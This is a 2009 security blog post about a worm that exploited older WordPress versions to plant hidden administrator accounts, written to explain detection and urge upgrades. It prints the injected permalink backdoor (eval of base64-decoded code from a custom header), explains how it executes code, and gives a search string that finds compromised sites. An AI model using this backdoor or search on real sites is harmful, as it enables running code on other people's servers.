Of Bytes and Badges

Have a blog? Is it running WordPress (i.e. the WordPress.org software, on your own domain)? Haven’t updated the software in a month or longer?

Guess what? You may not be the only one posting on it!

News is going-around about a rather sneaky WordPress worm. After registering for the blog, it uses an escalation of privileges vulnerability in versions of WP older than 2.8.3 to get admin powers, lie dormant, and eventually do…something. Post spam? Malware links? The sky is the limit, really. (WordPress announcement here, information about the latest security update, 2.8.4, here).

There are some good resources about the attacks already out there. “Lorelle on WordPress” has an extensive post about symptoms and remediation. From her post:

How Do I Know If My Site Has Already Been Attacked?

There are two clues that your WordPress site has been attacked.

There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”

The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.

So it looks like there’s hex code in the URL, as well as a new admin account. Using this information, and a crafted Google search string (many variations would work):

“Powered by WordPress” inurl:eval(base64_decode(

…we find one such hacked site, with the following post addresses (NOTE: DON’T visit unless you know what you’re doing! Right now it’s benign, but that could change!):

So, let’s take one of the above links:

hxxp://www.wowfailblog.com/2009/06/30/pac-man-the-movie/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D%7C.+)&%/

and notice that it is almost, but not quite, identical to the format of some other hacked sites:

hxxp://bloodsweatvector.com/2009/04/28/from-russia-with-love/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D%7C.+)&%/

…though they’re both definitely from the same campaign. HTTP_REFERER seems to be far more popular than HTTP_EXECCODE (1,340 sites vs. 399).

If we convert the ASCII hex code in the first link, we get a clearer picture of what’s happening:

hxxp://www.wowfailblog.com/2009/06/30/pac-man-the-movie/?{${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

…see what’s happening there? That, my friends, is what we call a backdoor. Create a header called “HTTP_REFERER” (not to be confused with the legitimate “Referer” header). Place base64-encoded code in it (PHP, it appears) and watch as it’s eval’ed on the fly, forcing the site to do just about anything. Note that I did not attempt testing this, as it’s executing arbitrary code on someone elses’ system, and that’s a big, illegal no-no.

This all seems like a handy initial takeover mechanism, but once the bogus Admin account has been added, it seems like this would be more useful for detecting infected sites than it is for further intrusion. Registering on a blog and somehow modifying these URLs would seem to be the initial vulnerability and attack vector. From the WordPress 2.8.3 upgrade post:

Unfortunately, I missed some places when fixing the privilege escalation issues for 2.8.1.  Luckily, the entire WordPress community has our backs.  Several folks in the community dug deeper and discovered areas that were overlooked.  With their help, the remaining issues are fixed in 2.8.3.  Since this is a security release, upgrading is highly recommended.

Sounds about right. Too bad some people didn’t heed the warning!

Some closing thoughts on the subject:

• I calculate roughly 1,700 sites currently compromised and exhibiting the above URL anomalies. As we’ve seen, though, such signs of infection could be done-away with after a new Admin account is created, so infection rates could be higher.

• Despite some hysterical comments, all signs point to 2.8.3 and 2.8.4 both being safe from the attacks. There are, however, some apocryphal reports of 2.8.3 being exploited, but this doesn’t jive with the official WordPress announcement.

• Registration has to be available on a blog for infection, not just comments

• This does NOT affect WordPress.com users, like yours truly. WordPress.com is kept updated regularly.

• The exact mechanisms of attack are as-yet-unexplained, as far as I can tell. If someone can find a detailed writeup on the subject, or has logs of an attack, please let me know in the comments or email me at {bytesandbages}[at]{gmail.com}!

And if you’re not already infected? For the love of God, UPGRADE. If you are infected, email me and let’s try and get some more details about who just might be behind this. After that, follow Journey Etc’s excellent advice on clean-up. But only after.

Don’t think that this is a big deal? Read this. Not fun at all.

- David “Scared to Switch-Over to WordPress.org” Oxley